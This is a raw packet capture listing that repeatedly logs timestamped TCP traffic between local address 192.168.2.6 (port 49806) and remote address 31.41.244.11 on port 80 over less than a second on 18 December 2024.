                                                                                                                                                              Dec 18, 2024 11:47:17.357784986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.357821941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.357884884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.357917070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.358958960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.359005928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.359010935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.359035969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.494338989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.494354963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.494410992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.495048046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.495060921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.495107889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.496088028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.496154070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.496237993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.496273994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.497581005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.497592926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.497616053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.497796059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.498567104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.498579979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.498620033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.499686003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.499697924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.499728918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.500801086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.500844955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.500993013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.501234055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.502062082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.502185106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.502213955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.502244949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.503200054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.503211975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.503246069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.503266096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.504308939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.504322052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.504358053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.505462885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.505501032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.505604982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.505635977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.506664991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.506716967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.506814957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.506917953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.507869959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.507941008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.508012056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.508042097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.509046078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.509208918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.509227037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.509340048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.510309935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.510322094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.510349035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.510366917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.511365891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.511379004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.511405945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.511421919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.512593031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.512605906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.512646914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.513648987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.513787031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.513824940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.514487028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.514570951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.514605999 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.517348051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.517390013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.517523050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.517574072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.518517971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.518529892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.518553019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.518560886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.518564939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.518590927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.518610001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.519567013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.519609928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.519745111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.519777060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.520771980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.520826101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.520946980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.521061897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.521974087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.521987915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.522030115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.523085117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.523128033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.523293972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.523334026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.524338961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.524374962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.524418116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.525051117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.525077105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.525088072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.525113106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.526236057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.526283026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.526351929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.526400089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.527415991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.527455091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.527528048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.528002977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.528615952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.528657913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.528703928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.529047966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.529820919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.529897928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.529920101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.529951096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.531029940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.531073093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.531114101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.531157970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.532181025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.532228947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.532300949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.532337904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.533231974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.533371925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.533396006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.533411980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.534455061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.534502029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.534559011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.534606934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.535587072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.535643101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.535657883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.535721064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.536917925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.536966085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.536993027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.537028074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.537961960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.538008928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.538029909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.538074970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.539104939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.539166927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.539169073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.539343119 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.540317059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.540368080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.540394068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.541217089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.541362047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.541490078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.541524887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.542537928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.542671919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.542716026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.543710947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.543817997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.543860912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.544898987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.544955969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.544982910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.545018911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.546125889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.546220064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.546262980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.547386885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.547535896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.547578096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.549081087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.549220085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.549266100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.550470114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.550827026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.550909042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.552007914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.552086115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.552130938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.552856922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.552931070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.552978992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.553883076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.554020882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.554023027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.554066896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.554858923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.554920912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.554944992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.555824995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.555891037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.685230017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.685339928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.685396910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.685729980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.685810089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.685847044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.686880112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.686999083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.687038898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.688093901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.688271999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.688313007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.689323902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.689362049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.689409018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.690196991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.690463066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.690478086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.690510988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.691576958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.691679001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.691716909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.692749977 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.692866087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.692908049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.693896055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.693979979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.694020033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.695059061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.695173979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.695214033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.696302891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.696402073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.696445942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.697393894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.697432995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.697468996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.698193073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.698647022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.698703051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.698745012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.699795008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.699888945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.699927092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.700964928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.701073885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.701114893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.702100039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.702214003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.702229023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.703249931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.703288078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.703355074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.704473019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.704510927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.704583883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.704652071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.705590963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.705626965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.705740929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.706203938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.706804037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.706988096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.707037926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.707976103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.708112001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.708148956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.709201097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.709213972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.709243059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.709273100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.710295916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.710387945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.710458040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.711499929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.711605072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.711643934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.712692022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.712757111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.712790966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.713835955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.713933945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.713973045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.714976072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.715080023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.715117931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.716155052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.716259956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.716295004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.717292070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.717329979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.717437029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.717540026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.718594074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.718615055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.718653917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.719710112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.719815016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.719870090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.720798969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.720884085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.720918894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.722023964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.722103119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.722145081 CET4980680192.168.2.631.41.244.11
